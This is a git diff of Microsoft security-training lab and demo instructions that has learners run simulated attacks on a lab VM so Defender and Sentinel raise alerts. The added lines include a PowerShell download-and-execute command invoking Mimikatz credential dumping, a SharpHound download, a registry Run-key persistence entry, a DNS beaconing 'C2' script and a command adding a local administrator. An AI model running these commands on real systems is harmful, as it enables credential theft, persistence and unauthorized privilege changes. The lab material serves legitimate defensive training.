diff --git a/Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md b/Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md index 8db70f57..d7548f62 100644 --- a/Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md +++ b/Instructions/Labs/LAB_AK_02_Lab1_Ex2_Mitigate_Attacks.md @@ -14,7 +14,6 @@ You are a Security Operations Analyst working at a company that is implementing To explore the Defender for Endpoint attack mitigation capabilities, you will run two simulated attacks. - >**Note:** An **[interactive lab simulation](https://mslabs.cloudguides.com/guides/SC-200%20Lab%20Simulation%20-%20Mitigate%20attacks%20with%20Microsoft%20Defender%20for%20Endpoint)** is available that allows you to click through this lab at your own pace. You may find slight differences between the interactive simulation and the hosted lab, but the core concepts and ideas being demonstrated are the same. @@ -22,7 +21,7 @@ To explore the Defender for Endpoint attack mitigation capabilities, you will ru In this task, you will confirm that the device is onboarded successfully and create a test alert. -1. If you are not already at the Microsoft 365 Defender portal in your Microsoft Edge browser, go to (https://security.microsoft.com) and login as Admin for your tenant. +1. If you are not already at the Microsoft Defender XDR portal in your Microsoft Edge browser, go to (https://security.microsoft.com) and login as Admin for your tenant. 1. In the left-hand menu, under the **Assets** area, select **Devices**. Please wait until WIN1 appears in the Devices page before you continue. Otherwise, you might need to repeat this task to see the alerts that will be generated later. @@ -38,14 +37,52 @@ In this task, you will confirm that the device is onboarded successfully and cre 1. When the "User Account Control" window is shown, select **Yes** to allow the app to run. -1. Paste the script by right-clicking in the **Administrator: Command Prompt** windows and press **Enter** to run it. **Note:** The window closes automatically after running the script. +1. Paste the script by right-clicking in the **Administrator: Command Prompt** windows and press **Enter** to run it. + >**Note:** The window closes automatically after running the script. ### Task 2: Simulated Attacks -In this task, you will run two simulated attacks to explore the capabilities of Microsoft Defender for Endpoint. +In this task, you will run two *simulated* attacks using *PowerShell* on *WIN1* to explore the capabilities of Microsoft Defender for Endpoint. + +`Attack 1: Mimikatz - Credential Dumping` + +1. On the *WIN1* machine, type **Command** in the search bar and select **Run as administrator**. + +1. Copy and paste the following command in the **Administrator: Command Prompt** window and press **Enter** to run it. + + ```CommandPrompt + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" + ``` + +1. You should see a message that says *Access is denied*, and a pop-up message from `Microsoft Defender Antivirus, Windows Security Virus and threats protection` displaying *Threats found*. + +1. Exit the **Administrator: Command Prompt** window by typing **exit** and pressing **Enter**. + +`Attack 2: Bloodhound - Collection` + +1. On the *WIN1* machine, type **PowerShell** in the search bar, select **Windows PowerShell** and select **Run as administrator**. -1. From the left menu, under **Endpoints**, select **Evaluation & tutorials** and then select **Tutorials & simulations** from the left side. +1. Copy and paste the following commands in the **Administrator: Windows PowerShell** window and press **Enter** to run it. + + ```PowerShell + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" + ``` + + >**Note:** It is recommended to copy, paste and run the commands one at a time. You can open *Notepad* and copy the commands into a temporary file to accomplish this. The first command creates a folder named *ExternalPayloads* in the same folder where the *Atomic Red Team* folder is located. The second command downloads the *SharpHound.ps1* file from the *BloodHound* GitHub repository and saves it in the *ExternalPayloads* folder. + +1. You should see a pop-up message from `Windows Security Virus and threats protection` displaying *Threats found*. + +1. Copy and paste the following command in the **Administrator: Windows PowerShell** window and press **Enter** to run it. + + ```PowerShell + Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" + ``` + +1. If the output is *True*, the Malware payload file has not been removed by Microsoft Defender Antivirus. If the output is *False*, the Malware payload file has been removed by Microsoft Defender Antivirus. Use the up-arrow key to repeat the command until the output is *False*. + + - +1. Repeat the last 3 steps to run another tutorial, *Automated investigation (fileless attack)*. This is no longer working due to win1 AV ---> ### Task 3: Investigate the Attacks -1. In the Microsoft 365 Defender portal select **Incidents & alerts** from the left menu bar, then select **Incidents**. +1. In the Microsoft Defender XDR portal select **Incidents & alerts** from the left menu bar, then select **Incidents**. -1. A new incident called "Multi-stage incident..." is in the right pane. Select the incident name to load its details. +1. A new incident called "Multiple threat families detected on one endpoint" is in the right pane. Select the incident name to load its details. - >**Note:** An incident called "Suspicious..." might appear first. This will later be replaced with the aforementioned incident when Microsoft 365 Defender correlates them a single security issue, including the original test alert created in Task 1. + >**Note:** You should see both *Bloodhound* and Mimikatz* alerts in the **Alerts** pane. In **Assets/Devices**, the *win1* computer will now have a **Risk level** of *High*.. 1. Select the **Manage incident** button and a new window blade appears. -1. Under **Incident tags** type "Tutorial" and select **Tutorial (Create new)** to create a new tag. +1. Under **Incident tags** type "Simulation" and select **Simulation (Create new)** to create a new tag. 1. Select the toggle **Assign to** and add your user account (Me) as owner of the incident. @@ -78,6 +114,6 @@ In this task, you will run two simulated attacks to explore the capabilities of 1. Review the contents of the *Attack story, Alerts, Assets, Investigations, Evidence and Response*, and *Summary* tabs. Devices and Users are under the *Assets* tab. The *Attack story* tab displays the *Incident graph*. The **Hint:** Some tabs might be hidden due the size of your display. Select the ellipsis tab (...) to make them appear. ->**Warning:** The simulations and tutorials here are an excellent source of learning through practice. Simulations and tutorials are being added and edited regularly in the portal. However, some of these simulations & tutorials may interfere with performance of the labs designed for this training course. Only perform the simulations and tutorials recommended in the instructions provided for this lab when using the course provided Azure tenant. You may perform the other simulations and tutorials *after* this training course is complete with this tenant. + >**Warning:** The simulated attacks here are an excellent source of learning through practice. Only perform the attacks in the instructions provided for this lab when using the course provided Azure tenant. You may perform other simulated attacks *after* this training course is complete with this tenant. ## You have completed the lab. diff --git a/Instructions/Labs/LAB_AK_03_Lab1_Ex2_Azure_Defender.md b/Instructions/Labs/LAB_AK_03_Lab1_Ex2_Azure_Defender.md index 89f51247..f2e060ec 100644 --- a/Instructions/Labs/LAB_AK_03_Lab1_Ex2_Azure_Defender.md +++ b/Instructions/Labs/LAB_AK_03_Lab1_Ex2_Azure_Defender.md @@ -37,22 +37,23 @@ In this task, you will review Regulatory compliance configuration in Microsoft D 1. Select your subscription. -1. Under *Policy settings*, select **Security policy** in the portal menu. + >**Hint:** Select **Expand all** to find your subscription if you a hierarchy of Management Groups. -1. Scroll down and and review the "Industry & regulatory standards" available to you by default. Note that *ISO 27001* is now deprecated. +1. Under *Settings*, select **Security policy** in the portal menu. -1. Select **Add more standards** to add the updated ISO 27001:2013 regulatory standard. +1. Scroll down and and review the "Security standards" available to you by default. -1. Select the **Add** button to right of *ISO 27001:2013*. +1. Use the search box to find *ISO 27001:2013*. -1. A new page to assign the Azure Policy initiative opens. Confirm that your subscription is selected under *Scope* and click **Review and create**. +1. Select and move the **Status** slider to right of *ISO 27001:2013* to **On**. -1. Select **Create** to assign the Azure Policy initiative to your subscription. + >**Note:** Some standards require you to assign ane Azure Policy initiative. -1. Select Microsoft Defender for Cloud below the search box to return to the main blade. +1. Select **Refresh** on the page menu to confirm that *ISO 27001:2013* is set to *On* for your subscription. - >**Note:** You might want to return later to *Regulatory compliance* to review the new standard controls and recommendations. +1. Close the *Security policies* page by selecting the 'X' on the upper right of the page to go back to the **Environment settings**. + >**Note:** You might want to return later to *Regulatory compliance* to review the new standard controls and recommendations. ### Task 2: Explore Security posture and recommendations diff --git a/Instructions/Labs/LAB_AK_06_Lab1_Ex1_Connect_Services.md b/Instructions/Labs/LAB_AK_06_Lab1_Ex1_Connect_Services.md index 7f9272ff..e735dd1e 100644 --- a/Instructions/Labs/LAB_AK_06_Lab1_Ex1_Connect_Services.md +++ b/Instructions/Labs/LAB_AK_06_Lab1_Ex1_Connect_Services.md @@ -37,7 +37,7 @@ In this task, you will access your Microsoft Sentinel workspace. 1. Select *Create incidents based on Microsoft Defender for Cloud* from the rule templates. -1. Select **Create rule** in the connector information blade. +1. Select **Create rule** in the rule information pane, or select the ellipsis (...) and **+ Create rule**. 1. In the Analytics rule wizard, select **Next: Automated response**, then select **Next: Review and create**. diff --git a/Instructions/VTD_Demos/00-prerequisites.md b/Instructions/VTD_Demos/00-prerequisites.md index a1a5be35..9dbd4ec0 100644 --- a/Instructions/VTD_Demos/00-prerequisites.md +++ b/Instructions/VTD_Demos/00-prerequisites.md @@ -581,98 +581,98 @@ In this task, you will perform attacks on a host with Microsoft Defender for End 1. In the search of the task bar, enter *Command*. Command Prompt will be displayed in the search results. Right-click on the Command Prompt and select **Run as Administrator**. Confirm any User Account Control prompts that appear. 1. In the command prompt, enter the command in each row pressing Enter key after each row: -``` -cd \ -mkdir temp -cd temp -``` + + ```CommandPrompt + cd \ + mkdir temp + cd temp + ``` 1. Copy and run this command: -``` -REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SOC Test" /t REG_SZ /F /D "C:\temp\startup.bat" -``` + ```CommandPrompt + REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SOC Test" /t REG_SZ /F /D "C:\temp\startup.bat" + ``` ### Task 2: Create C2 (command and control) attack 1. Login to `WIN1` virtual machine as Admin with the password: **Pa55w.rd**. 1. In the search of the task bar, enter *Command*. Command Prompt will be displayed in the search results. Right-click on the Command Prompt and select **Run as Administrator**. Confirm any User Account Control prompts that appear. -1. -1. -1. Attack 2 - Copy and run this command: - -``` -notepad c2.ps1 -``` -Select **Yes** to create a new file and copy the following PowerShell script into c2.ps1 and select **save**. - -**Note** Paste into the Virtual Machine might have a limited length. Paste this in three sections to ensure all the script is pasted into the Virtual Machine. Make sure the script looks as it does in these instructions within the notepad c2.ps1 file. - -``` - - -param( - [string]$Domain = "microsoft.com", - [string]$Subdomain = "subdomain", - [string]$Sub2domain = "sub2domain", - [string]$Sub3domain = "sub3domain", - [string]$QueryType = "TXT", - [int]$C2Interval = 8, - [int]$C2Jitter = 20, - [int]$RunTime = 240 -) +1. Attack 2 - Copy and run this command: -$RunStart = Get-Date -$RunEnd = $RunStart.addminutes($RunTime) + ```CommandPrompt + notepad c2.ps1 + ``` -$x2 = 1 -$x3 = 1 -Do { - $TimeNow = Get-Date - Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout +Select **Yes** to create a new file and copy the following PowerShell script into c2.ps1 and select **save**. - if ($x2 -eq 3 ) - { - Resolve-DnsName -type $QueryType $Sub2domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout - - $x2 = 1 +>**Note:** Paste into the Virtual Machine might have a limited length. Paste this in three sections to ensure all the script is pasted into the Virtual Machine. Make sure the script looks as it does in these instructions within the notepad c2.ps1 file. - } - else - { - $x2 = $x2 + 1 - } + ```PowerShell - if ($x3 -eq 7 ) - { - - Resolve-DnsName -type $QueryType $Sub3domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout - - $x3 = 1 + param( + [string]$Domain = "microsoft.com", + [string]$Subdomain = "subdomain", + [string]$Sub2domain = "sub2domain", + [string]$Sub3domain = "sub3domain", + [string]$QueryType = "TXT", + [int]$C2Interval = 8, + [int]$C2Jitter = 20, + [int]$RunTime = 240 + ) + + + $RunStart = Get-Date + $RunEnd = $RunStart.addminutes($RunTime) + + $x2 = 1 + $x3 = 1 + Do { + $TimeNow = Get-Date + Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout + + if ($x2 -eq 3 ) + { + Resolve-DnsName -type $QueryType $Sub2domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout + + $x2 = 1 + + } + else + { + $x2 = $x2 + 1 + } + if ($x3 -eq 7 ) + { + + Resolve-DnsName -type $QueryType $Sub3domain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout + + $x3 = 1 + + } + else + { + $x3 = $x3 + 1 + } + + + $Jitter = ((Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1) +$C2Interval + Start-Sleep -Seconds $Jitter } - else - { - $x3 = $x3 + 1 - } - + Until ($TimeNow -ge $RunEnd) + ``` - $Jitter = ((Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1) +$C2Interval - Start-Sleep -Seconds $Jitter -} -Until ($TimeNow -ge $RunEnd) +At the command prompt, enter the following, enter the command in each row pressing Enter key after each row: -``` + ```PowerShell + .\c2.ps1 + ``` -At the command prompt, enter the following, enter the command in each row pressing Enter key after each row: -``` -powershell -.\c2.ps1 -``` -**Note:** You will see resolve errors. This is to be expected. -Let this command/powershell script run in the background. Don't close the window. The command needs to generate log entries for some hours. You can proceed to the next task and next exercises while this script runs. The data created by this task will be used in the Threat Hunting lab later. This process will not create substantial amounts of data or processing. +>**Note:** You will see resolve errors. This is to be expected. + Let this command/powershell script run in the background. Don't close the window. The command needs to generate log entries for some hours. You can proceed to the next task and next exercises while this script runs. The data created by this task will be used in the Threat Hunting lab later. This process will not create substantial amounts of data or processing. ### Task 2: Attack Windows configured with the Azure Monitor Agent (AMA) @@ -692,6 +692,6 @@ In this task, you will perform attacks on a host with the Security Events connec net localgroup administrators theusernametoadd /add ``` ->**Note**: Make sure there is only one command per line, and you can rerun the commands by changing the username. + >**Note**: Make sure there is only one command per line, and you can rerun the commands by changing the username. 1. In the `Output` window you should see `The command completed successfully` three times diff --git a/Instructions/VTD_Demos/02-mitigate-threats-defender-for-endpoint.md b/Instructions/VTD_Demos/02-mitigate-threats-defender-for-endpoint.md index d6b79234..92607afe 100644 --- a/Instructions/VTD_Demos/02-mitigate-threats-defender-for-endpoint.md +++ b/Instructions/VTD_Demos/02-mitigate-threats-defender-for-endpoint.md @@ -4,20 +4,47 @@ ## Simulated Attacks -In this task, you will run one simulated attack to explore the capabilities of Microsoft Defender for Endpoint. +In this task, you will run two simulated attack to explore the capabilities of Microsoft Defender for Endpoint. -1. If you are not already at the Microsoft Defender Security Center in your browser, go to the Microsoft Defender Security Center at (https://security.microsoft.com) logged in as Admin for your tenant. +1. If you are not already at the Microsoft Defender XDR portal in your browser, go to Microsoft Defender XDR at (https://security.microsoft.com) logged in as Admin for your tenant. -1. From the menu, under **Endpoints**, select **Evaluation & tutorials** and then select **Tutorials & simulations** from the left side. +You will run the *simulated* attacks using *PowerShell* on *WIN1* to explore the capabilities of Microsoft Defender for Endpoint. -1. Select the **Tutorials** tab. +`Attack 1: Mimikatz - Credential Dumping` -1. Under *Automated investigation (backdoor)* you will see a message describing the scenario. Below this paragraph, click **Read the walkthrough**. A new browser tab opens which includes instructions to perform the simulation. +1. On the *WIN1* machine, type **Command** in the search bar and select **Run as administrator**. -1. In the new browser tab, locate the section named **Run the simulation** (page 5, starting at step 2) and follow the steps to run the attack. **Hint:** The simulation file *RS4_WinATP-Intro-Invoice.docm* can be found back in portal, just below the **Read the walkthrough** you selected in the previous step by selecting the **Get simulation file** button. +1. Copy and paste the following command in the **Administrator: Command Prompt** window and press **Enter** to run it. - 1. **Note:** After executing the file with the exploit, you can return to the [Microsoft 365 Defender Security Center](https://security.microsoft.com) and click on the **Incidents** tab to see the alerts. The guide incorrectly references the *Microsoft Defender ATP portal* which has been migrated and rebranded. - 1. Open the incident page and click **Manage Incident**. Click **Resolve incident** to resolve all of the active alerts. + ```CommandPrompt + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" + ``` +1. You should see a message that says *Access is denied*, and a pop-up message from `Microsoft Defender Antivirus, Windows Security Virus and threats protection` displaying *Threats found*. + +1. Exit the **Administrator: Command Prompt** window by typing **exit** and pressing **Enter**. + +`Attack 2: Bloodhound - Collection` + +1. On the *WIN1* machine, type **PowerShell** in the search bar, select **Windows PowerShell** and select **Run as administrator**. + +1. Copy and paste the following commands in the **Administrator: Windows PowerShell** window and press **Enter** to run it. + + ```PowerShell + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" + ``` + + >**Note:** It is recommended to copy, paste and run the commands one at a time. You can open *Notepad* and copy the commands into a temporary file to accomplish this. The first command creates a folder named *ExternalPayloads* in the same folder where the *Atomic Red Team* folder is located. The second command downloads the *SharpHound.ps1* file from the *BloodHound* GitHub repository and saves it in the *ExternalPayloads* folder. + +1. You should see a pop-up message from `Windows Security Virus and threats protection` displaying *Threats found*. + +1. Copy and paste the following command in the **Administrator: Windows PowerShell** window and press **Enter** to run it. + + ```PowerShell + Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" + ``` + +1. If the output is *True*, the Malware payload file has not been removed by Microsoft Defender Antivirus. If the output is *False*, the Malware payload file has been removed by Microsoft Defender Antivirus. Use the up-arrow key to repeat the command until the output is *False*. ## You have completed the Demo